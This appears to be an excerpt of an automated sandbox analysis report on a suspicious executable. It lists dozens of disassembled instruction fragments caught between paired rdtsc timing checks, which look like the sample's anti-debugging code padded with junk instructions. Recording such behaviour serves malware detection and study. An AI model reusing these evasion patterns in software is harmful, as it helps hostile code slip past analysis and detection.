Source: C:\Users\user\Documents\iofolko5\kPy9KuGWnhtidoY4IdmVbiaT.exe	RDTSC instruction interceptor: First address: 1067291 second address: 10672D7 instructions: 0x00000000 rdtsc 0x00000002 jns 00007F76E5186DECh 0x00000008 jnp 00007F76E5186DE6h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 push eax 0x00000011 push ecx 0x00000012 push ebx 0x00000013 push ebx 0x00000014 pop ebx 0x00000015 pop ebx 0x00000016 pop ecx 0x00000017 nop 0x00000018 mov di, 7400h 0x0000001c push 00000000h 0x0000001e mov bl, 4Ch 0x00000020 mov bx, dx 0x00000023 push 00000000h 0x00000025 cld 0x00000026 mov dword ptr [ebp+124778CFh], esi 0x0000002c xchg eax, esi 0x0000002d push edi 0x0000002e jmp 00007F76E5186DF1h 0x00000033 pop edi 0x00000034 push eax 0x00000035 push ebx 0x00000036 push eax 0x00000037 push edx 0x00000038 push edi 0x00000039 pop edi 0x0000003a rdtsc
Source: C:\Users\user\Documents\iofolko5\kPy9KuGWnhtidoY4IdmVbiaT.exe	RDTSC instruction interceptor: First address: 10078C2 second address: 1007901 instructions: 0x00000000 rdtsc 0x00000002 jne 00007F76E5036BA6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d jnp 00007F76E5036BC0h 0x00000013 jbe 00007F76E5036BB2h 0x00000019 jne 00007F76E5036BA6h 0x0000001f jnp 00007F76E5036BA6h 0x00000025 rdtsc
Source: C:\Users\user\Documents\iofolko5\kPy9KuGWnhtidoY4IdmVbiaT.exe	RDTSC instruction interceptor: First address: 106B6B5 second address: 106B6BB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edi 0x00000005 pop edi 0x00000006 rdtsc
Source: C:\Users\user\Documents\iofolko5\kPy9KuGWnhtidoY4IdmVbiaT.exe	RDTSC instruction interceptor: First address: 106C7A7 second address: 106C7AD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Documents\iofolko5\kPy9KuGWnhtidoY4IdmVbiaT.exe	RDTSC instruction interceptor: First address: 106C7AD second address: 106C7FE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jnl 00007F76E5186DE8h 0x00000010 pop edx 0x00000011 nop 0x00000012 push 00000000h 0x00000014 push edi 0x00000015 call 00007F76E5186DE8h 0x0000001a pop edi 0x0000001b mov dword ptr [esp+04h], edi 0x0000001f add dword ptr [esp+04h], 00000019h 0x00000027 inc edi 0x00000028 push edi 0x00000029 ret 0x0000002a pop edi 0x0000002b ret 0x0000002c xor dword ptr [ebp+1247CBE1h], eax 0x00000032 push 00000000h 0x00000034 stc 0x00000035 push 00000000h 0x00000037 mov dword ptr [ebp+122D30EDh], eax 0x0000003d add dword ptr [ebp+122D2D0Dh], esi 0x00000043 xchg eax, esi 0x00000044 push ebx 0x00000045 pushad 0x00000046 push eax 0x00000047 push edx 0x00000048 rdtsc
Source: C:\Users\user\Documents\iofolko5\kPy9KuGWnhtidoY4IdmVbiaT.exe	RDTSC instruction interceptor: First address: 106F844 second address: 106F84A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Documents\iofolko5\kPy9KuGWnhtidoY4IdmVbiaT.exe	RDTSC instruction interceptor: First address: 106F84A second address: 106F862 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F76E5186DF4h 0x00000009 rdtsc
Source: C:\Users\user\Documents\iofolko5\kPy9KuGWnhtidoY4IdmVbiaT.exe	RDTSC instruction interceptor: First address: 1005E6C second address: 1005E99 instructions: 0x00000000 rdtsc 0x00000002 jc 00007F76E5036BACh 0x00000008 jl 00007F76E5036BA6h 0x0000000e jmp 00007F76E5036BB3h 0x00000013 pop edx 0x00000014 pop eax 0x00000015 jo 00007F76E5036BC9h 0x0000001b push eax 0x0000001c push edx 0x0000001d push eax 0x0000001e pop eax 0x0000001f rdtsc
Source: C:\Users\user\Documents\iofolko5\kPy9KuGWnhtidoY4IdmVbiaT.exe	RDTSC instruction interceptor: First address: 1005E99 second address: 1005EA4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Documents\iofolko5\kPy9KuGWnhtidoY4IdmVbiaT.exe	RDTSC instruction interceptor: First address: 1079A54 second address: 1079A58 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Documents\iofolko5\kPy9KuGWnhtidoY4IdmVbiaT.exe	RDTSC instruction interceptor: First address: 1079A58 second address: 1079A6A instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 js 00007F76E5186DEAh 0x0000000e pushad 0x0000000f popad 0x00000010 pushad 0x00000011 popad 0x00000012 rdtsc
Source: C:\Users\user\Documents\iofolko5\kPy9KuGWnhtidoY4IdmVbiaT.exe	RDTSC instruction interceptor: First address: 1079A6A second address: 1079A6F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Documents\iofolko5\kPy9KuGWnhtidoY4IdmVbiaT.exe	RDTSC instruction interceptor: First address: 1079BEF second address: 1079BF5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Documents\iofolko5\kPy9KuGWnhtidoY4IdmVbiaT.exe	RDTSC instruction interceptor: First address: 1079BF5 second address: 1079C0D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007F76E5036BB0h 0x0000000d rdtsc
Source: C:\Users\user\Documents\iofolko5\kPy9KuGWnhtidoY4IdmVbiaT.exe	RDTSC instruction interceptor: First address: 1079D73 second address: 1079D79 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Documents\iofolko5\kPy9KuGWnhtidoY4IdmVbiaT.exe	RDTSC instruction interceptor: First address: 1079D79 second address: 1079D81 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
Source: C:\Users\user\Documents\iofolko5\kPy9KuGWnhtidoY4IdmVbiaT.exe	RDTSC instruction interceptor: First address: 1079D81 second address: 1079D8B instructions: 0x00000000 rdtsc 0x00000002 jc 00007F76E5186DF2h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Documents\iofolko5\kPy9KuGWnhtidoY4IdmVbiaT.exe	RDTSC instruction interceptor: First address: 1053C1A second address: 1053C24 instructions: 0x00000000 rdtsc 0x00000002 jnl 00007F76E5036BA6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Documents\iofolko5\kPy9KuGWnhtidoY4IdmVbiaT.exe	RDTSC instruction interceptor: First address: 1053C24 second address: 1053C2A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 rdtsc
Source: C:\Users\user\Documents\iofolko5\kPy9KuGWnhtidoY4IdmVbiaT.exe	RDTSC instruction interceptor: First address: 1055F6A second address: 1055F95 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F76E5036BB2h 0x0000000b popad 0x0000000c push eax 0x0000000d pushad 0x0000000e push ecx 0x0000000f jg 00007F76E5036BA6h 0x00000015 pop ecx 0x00000016 push eax 0x00000017 push edx 0x00000018 jnp 00007F76E5036BA6h 0x0000001e rdtsc
Source: C:\Users\user\Documents\iofolko5\kPy9KuGWnhtidoY4IdmVbiaT.exe	RDTSC instruction interceptor: First address: 105F9E0 second address: 105F9E5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 rdtsc
Source: C:\Users\user\Documents\iofolko5\kPy9KuGWnhtidoY4IdmVbiaT.exe	RDTSC instruction interceptor: First address: 1060ADC second address: 1060AE2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Documents\iofolko5\kPy9KuGWnhtidoY4IdmVbiaT.exe	RDTSC instruction interceptor: First address: 1061B43 second address: 1061B47 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Documents\iofolko5\kPy9KuGWnhtidoY4IdmVbiaT.exe	RDTSC instruction interceptor: First address: 1061B47 second address: 1061C04 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F76E5036BAAh 0x0000000b popad 0x0000000c nop 0x0000000d push 00000000h 0x0000000f push edx 0x00000010 call 00007F76E5036BA8h 0x00000015 pop edx 0x00000016 mov dword ptr [esp+04h], edx 0x0000001a add dword ptr [esp+04h], 00000017h 0x00000022 inc edx 0x00000023 push edx 0x00000024 ret 0x00000025 pop edx 0x00000026 ret 0x00000027 jmp 00007F76E5036BB8h 0x0000002c jbe 00007F76E5036BACh 0x00000032 mov ebx, dword ptr [ebp+122D257Eh] 0x00000038 push dword ptr fs:[00000000h] 0x0000003f push 00000000h 0x00000041 push edi 0x00000042 call 00007F76E5036BA8h 0x00000047 pop edi 0x00000048 mov dword ptr [esp+04h], edi 0x0000004c add dword ptr [esp+04h], 00000017h 0x00000054 inc edi 0x00000055 push edi 0x00000056 ret 0x00000057 pop edi 0x00000058 ret 0x00000059 jmp 00007F76E5036BADh 0x0000005e mov dword ptr fs:[00000000h], esp 0x00000065 sub ebx, 2572B7F8h 0x0000006b mov eax, dword ptr [ebp+122D1669h] 0x00000071 pushad 0x00000072 mov dword ptr [ebp+122D293Bh], ebx 0x00000078 clc 0x00000079 popad 0x0000007a push FFFFFFFFh 0x0000007c push eax 0x0000007d pushad 0x0000007e jmp 00007F76E5036BADh 0x00000083 push eax 0x00000084 push edx 0x00000085 jl 00007F76E5036BA6h 0x0000008b rdtsc
Source: C:\Users\user\Documents\iofolko5\kPy9KuGWnhtidoY4IdmVbiaT.exe	RDTSC instruction interceptor: First address: 1063CD5 second address: 1063CD9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Documents\iofolko5\kPy9KuGWnhtidoY4IdmVbiaT.exe	RDTSC instruction interceptor: First address: 1064DC3 second address: 1064DC8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Documents\iofolko5\kPy9KuGWnhtidoY4IdmVbiaT.exe	RDTSC instruction interceptor: First address: 1064E81 second address: 1064E9C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F76E5186DEAh 0x00000008 jp 00007F76E5186DE6h 0x0000000e popad 0x0000000f pop edx 0x00000010 pop eax 0x00000011 push eax 0x00000012 push ecx 0x00000013 push edx 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\Documents\iofolko5\kPy9KuGWnhtidoY4IdmVbiaT.exe	RDTSC instruction interceptor: First address: 106B905 second address: 106B90B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Documents\iofolko5\kPy9KuGWnhtidoY4IdmVbiaT.exe	RDTSC instruction interceptor: First address: 106E9DE second address: 106E9E2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Documents\iofolko5\kPy9KuGWnhtidoY4IdmVbiaT.exe	RDTSC instruction interceptor: First address: 1070A39 second address: 1070A49 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F76E5036BACh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Documents\iofolko5\kPy9KuGWnhtidoY4IdmVbiaT.exe	RDTSC instruction interceptor: First address: 1071B37 second address: 1071B3C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Documents\iofolko5\kPy9KuGWnhtidoY4IdmVbiaT.exe	RDTSC instruction interceptor: First address: 106E9E2 second address: 106E9EC instructions: 0x00000000 rdtsc 0x00000002 jne 00007F76E5036BA6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Documents\iofolko5\kPy9KuGWnhtidoY4IdmVbiaT.exe	RDTSC instruction interceptor: First address: 1070A49 second address: 1070A4E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Documents\iofolko5\kPy9KuGWnhtidoY4IdmVbiaT.exe	RDTSC instruction interceptor: First address: 1069388 second address: 1069436 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F76E5036BB8h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp], eax 0x0000000c mov di, B681h 0x00000010 push dword ptr fs:[00000000h] 0x00000017 mov edi, dword ptr [ebp+122D2ACBh] 0x0000001d mov dword ptr fs:[00000000h], esp 0x00000024 push 00000000h 0x00000026 push esi 0x00000027 call 00007F76E5036BA8h 0x0000002c pop esi 0x0000002d mov dword ptr [esp+04h], esi 0x00000031 add dword ptr [esp+04h], 0000001Dh 0x00000039 inc esi 0x0000003a push esi 0x0000003b ret 0x0000003c pop esi 0x0000003d ret 0x0000003e pushad 0x0000003f add ecx, dword ptr [ebp+122D2AD7h] 0x00000045 mov dx, cx 0x00000048 popad 0x00000049 mov eax, dword ptr [ebp+122D0545h] 0x0000004f push 00000000h 0x00000051 push ebp 0x00000052 call 00007F76E5036BA8h 0x00000057 pop ebp 0x00000058 mov dword ptr [esp+04h], ebp 0x0000005c add dword ptr [esp+04h], 0000001Dh 0x00000064 inc ebp 0x00000065 push ebp 0x00000066 ret 0x00000067 pop ebp 0x00000068 ret 0x00000069 jp 00007F76E5036BA6h 0x0000006f push FFFFFFFFh 0x00000071 sbb bx, 4CD9h 0x00000076 nop 0x00000077 push eax 0x00000078 push edx 0x00000079 jbe 00007F76E5036BACh 0x0000007f rdtsc
Source: C:\Users\user\Documents\iofolko5\kPy9KuGWnhtidoY4IdmVbiaT.exe	RDTSC instruction interceptor: First address: 1070A4E second address: 1070A60 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push ebx 0x0000000b jne 00007F76E5186DE6h 0x00000011 pop ebx 0x00000012 rdtsc
Source: C:\Users\user\Documents\iofolko5\kPy9KuGWnhtidoY4IdmVbiaT.exe	RDTSC instruction interceptor: First address: 1069436 second address: 106943B instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Documents\iofolko5\kPy9KuGWnhtidoY4IdmVbiaT.exe	RDTSC instruction interceptor: First address: 1070B4B second address: 1070B77 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 pushad 0x00000007 jmp 00007F76E5186DEAh 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F76E5186DF9h 0x00000013 rdtsc
Source: C:\Users\user\Documents\iofolko5\kPy9KuGWnhtidoY4IdmVbiaT.exe	RDTSC instruction interceptor: First address: 1070B77 second address: 1070B7B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Documents\iofolko5\kPy9KuGWnhtidoY4IdmVbiaT.exe	RDTSC instruction interceptor: First address: 1080103 second address: 1080113 instructions: 0x00000000 rdtsc 0x00000002 jns 00007F76E5186DE6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop ebx 0x0000000b push eax 0x0000000c pushad 0x0000000d push ecx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Documents\iofolko5\kPy9KuGWnhtidoY4IdmVbiaT.exe	RDTSC instruction interceptor: First address: 1080113 second address: 108011C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 push eax 0x00000006 push edx 0x00000007 pushad 0x00000008 popad 0x00000009 rdtsc
Source: C:\Users\user\Documents\iofolko5\kPy9KuGWnhtidoY4IdmVbiaT.exe	RDTSC instruction interceptor: First address: 108011C second address: 108013A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F76E5186DF1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a mov eax, dword ptr [esp+04h] 0x0000000e pushad 0x0000000f pushad 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Documents\iofolko5\kPy9KuGWnhtidoY4IdmVbiaT.exe	RDTSC instruction interceptor: First address: 108013A second address: 1080157 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jno 00007F76E5036BA6h 0x0000000a popad 0x0000000b push edx 0x0000000c push esi 0x0000000d pop esi 0x0000000e pop edx 0x0000000f popad 0x00000010 mov eax, dword ptr [eax] 0x00000012 jo 00007F76E5036BB0h 0x00000018 pushad 0x00000019 pushad 0x0000001a popad 0x0000001b push eax 0x0000001c push edx 0x0000001d rdtsc
Source: C:\Users\user\Documents\iofolko5\kPy9KuGWnhtidoY4IdmVbiaT.exe	RDTSC instruction interceptor: First address: 1080200 second address: 1080207 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\Documents\iofolko5\kPy9KuGWnhtidoY4IdmVbiaT.exe	RDTSC instruction interceptor: First address: 1080207 second address: 108020D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Documents\iofolko5\kPy9KuGWnhtidoY4IdmVbiaT.exe	RDTSC instruction interceptor: First address: 108020D second address: 1080211 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Documents\iofolko5\kPy9KuGWnhtidoY4IdmVbiaT.exe	RDTSC instruction interceptor: First address: 10802E4 second address: EA3B51 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F76E5036BB1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, dword ptr [eax] 0x0000000b jo 00007F76E5036BBAh 0x00000011 jmp 00007F76E5036BB4h 0x00000016 mov dword ptr [esp+04h], eax 0x0000001a jbe 00007F76E5036BAEh 0x00000020 pop eax 0x00000021 stc 0x00000022 push dword ptr [ebp+122D06E1h] 0x00000028 clc 0x00000029 call dword ptr [ebp+122D219Bh] 0x0000002f pushad 0x00000030 jnc 00007F76E5036BA7h 0x00000036 xor eax, eax 0x00000038 pushad 0x00000039 xor esi, 7ABDAB1Ch 0x0000003f mov dx, di 0x00000042 popad 0x00000043 mov edx, dword ptr [esp+28h] 0x00000047 mov dword ptr [ebp+122D220Ch], edx 0x0000004d stc 0x0000004e mov dword ptr [ebp+122D2A9Bh], eax 0x00000054 mov dword ptr [ebp+122D292Ch], edx 0x0000005a mov esi, 0000003Ch 0x0000005f clc 0x00000060 or dword ptr [ebp+122D220Ch], ebx 0x00000066 add esi, dword ptr [esp+24h] 0x0000006a stc 0x0000006b lodsw 0x0000006d cld 0x0000006e add eax, dword ptr [esp+24h] 0x00000072 xor dword ptr [ebp+122D292Ch], esi 0x00000078 jmp 00007F76E5036BB4h 0x0000007d mov ebx, dword ptr [esp+24h] 0x00000081 mov dword ptr [ebp+122D292Ch], ecx 0x00000087 push eax 0x00000088 jbe 00007F76E5036BB8h 0x0000008e push eax 0x0000008f push edx 0x00000090 jno 00007F76E5036BA6h 0x00000096 rdtsc
Source: C:\Users\user\Documents\iofolko5\kPy9KuGWnhtidoY4IdmVbiaT.exe	RDTSC instruction interceptor: First address: 1084249 second address: 1084262 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F76E5186DF5h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Documents\iofolko5\kPy9KuGWnhtidoY4IdmVbiaT.exe	RDTSC instruction interceptor: First address: 10843C7 second address: 10843E0 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F76E5036BB4h 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Documents\iofolko5\kPy9KuGWnhtidoY4IdmVbiaT.exe	RDTSC instruction interceptor: First address: 10846C3 second address: 10846C7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Documents\iofolko5\kPy9KuGWnhtidoY4IdmVbiaT.exe	RDTSC instruction interceptor: First address: 108499A second address: 10849A2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Documents\iofolko5\kPy9KuGWnhtidoY4IdmVbiaT.exe	RDTSC instruction interceptor: First address: 1084B0E second address: 1084B12 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Documents\iofolko5\kPy9KuGWnhtidoY4IdmVbiaT.exe	RDTSC instruction interceptor: First address: 1089F81 second address: 1089F87 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Documents\iofolko5\kPy9KuGWnhtidoY4IdmVbiaT.exe	RDTSC instruction interceptor: First address: 1089F87 second address: 1089F91 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnl 00007F76E5186DE6h 0x0000000a rdtsc
Source: C:\Users\user\Documents\iofolko5\kPy9KuGWnhtidoY4IdmVbiaT.exe	RDTSC instruction interceptor: First address: 1089F91 second address: 1089FAD instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F76E5036BB8h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Documents\iofolko5\kPy9KuGWnhtidoY4IdmVbiaT.exe	RDTSC instruction interceptor: First address: 108961B second address: 108961F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Documents\iofolko5\kPy9KuGWnhtidoY4IdmVbiaT.exe	RDTSC instruction interceptor: First address: 108961F second address: 108963B instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F76E5036BA6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b jmp 00007F76E5036BAEh 0x00000010 pushad 0x00000011 popad 0x00000012 popad 0x00000013 rdtsc
Source: C:\Users\user\Documents\iofolko5\kPy9KuGWnhtidoY4IdmVbiaT.exe	RDTSC instruction interceptor: First address: 108963B second address: 1089646 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 jbe 00007F76E5186DE6h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Documents\iofolko5\kPy9KuGWnhtidoY4IdmVbiaT.exe	RDTSC instruction interceptor: First address: 1089646 second address: 1089670 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 pop edx 0x00000006 pop eax 0x00000007 pushad 0x00000008 pushad 0x00000009 push esi 0x0000000a pop esi 0x0000000b jnl 00007F76E5036BA6h 0x00000011 popad 0x00000012 push eax 0x00000013 push edx 0x00000014 jmp 00007F76E5036BB6h 0x00000019 rdtsc
Source: C:\Users\user\Documents\iofolko5\kPy9KuGWnhtidoY4IdmVbiaT.exe	RDTSC instruction interceptor: First address: 1089670 second address: 1089699 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F76E5186DEDh 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b jmp 00007F76E5186DF1h 0x00000010 push ecx 0x00000011 push edx 0x00000012 pop edx 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\Documents\iofolko5\kPy9KuGWnhtidoY4IdmVbiaT.exe	RDTSC instruction interceptor: First address: 1089CCE second address: 1089CD2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Documents\iofolko5\kPy9KuGWnhtidoY4IdmVbiaT.exe	RDTSC instruction interceptor: First address: 108DFC4 second address: 108DFC8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Documents\iofolko5\kPy9KuGWnhtidoY4IdmVbiaT.exe	RDTSC instruction interceptor: First address: 1050565 second address: 105056A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Documents\iofolko5\kPy9KuGWnhtidoY4IdmVbiaT.exe	RDTSC instruction interceptor: First address: 1050ABD second address: 1050B1C instructions: 0x00000000 rdtsc 0x00000002 ja 00007F76E5186DECh 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b jng 00007F76E5186DEEh 0x00000011 jnc 00007F76E5186DE8h 0x00000017 mov eax, dword ptr [esp+04h] 0x0000001b jmp 00007F76E5186DF8h 0x00000020 mov eax, dword ptr [eax] 0x00000022 pushad 0x00000023 jno 00007F76E5186DFEh 0x00000029 push ebx 0x0000002a push eax 0x0000002b push edx 0x0000002c rdtsc
Source: C:\Users\user\Documents\iofolko5\kPy9KuGWnhtidoY4IdmVbiaT.exe	RDTSC instruction interceptor: First address: 1050B1C second address: 1050B86 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 popad 0x00000006 mov dword ptr [esp+04h], eax 0x0000000a js 00007F76E5036BB5h 0x00000010 jmp 00007F76E5036BAFh 0x00000015 pop eax 0x00000016 pushad 0x00000017 jmp 00007F76E5036BB6h 0x0000001c mov dx, 5217h 0x00000020 popad 0x00000021 sub dword ptr [ebp+122D22D4h], eax 0x00000027 call 00007F76E5036BA9h 0x0000002c push eax 0x0000002d push edx 0x0000002e pushad 0x0000002f jmp 00007F76E5036BB5h 0x00000034 jo 00007F76E5036BA6h 0x0000003a popad 0x0000003b rdtsc
Source: C:\Users\user\Documents\iofolko5\kPy9KuGWnhtidoY4IdmVbiaT.exe	RDTSC instruction interceptor: First address: 1050B86 second address: 1050B8B instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Documents\iofolko5\kPy9KuGWnhtidoY4IdmVbiaT.exe	RDTSC instruction interceptor: First address: 1050B8B second address: 1050BCD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 push edi 0x00000009 jmp 00007F76E5036BB4h 0x0000000e pop edi 0x0000000f mov eax, dword ptr [esp+04h] 0x00000013 jmp 00007F76E5036BB9h 0x00000018 mov eax, dword ptr [eax] 0x0000001a pushad 0x0000001b push eax 0x0000001c push edx 0x0000001d push edx 0x0000001e pop edx 0x0000001f rdtsc
Source: C:\Users\user\Documents\iofolko5\kPy9KuGWnhtidoY4IdmVbiaT.exe	RDTSC instruction interceptor: First address: 1050BCD second address: 1050BFB instructions: 0x00000000 rdtsc 0x00000002 js 00007F76E5186DE6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b jmp 00007F76E5186DF1h 0x00000010 jl 00007F76E5186DE6h 0x00000016 popad 0x00000017 popad 0x00000018 mov dword ptr [esp+04h], eax 0x0000001c push eax 0x0000001d push edx 0x0000001e push eax 0x0000001f push edx 0x00000020 push eax 0x00000021 push edx 0x00000022 rdtsc
Source: C:\Users\user\Documents\iofolko5\kPy9KuGWnhtidoY4IdmVbiaT.exe	RDTSC instruction interceptor: First address: 1050BFB second address: 1050BFF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Documents\iofolko5\kPy9KuGWnhtidoY4IdmVbiaT.exe	RDTSC instruction interceptor: First address: 1050BFF second address: 1050C16 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F76E5186DF3h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
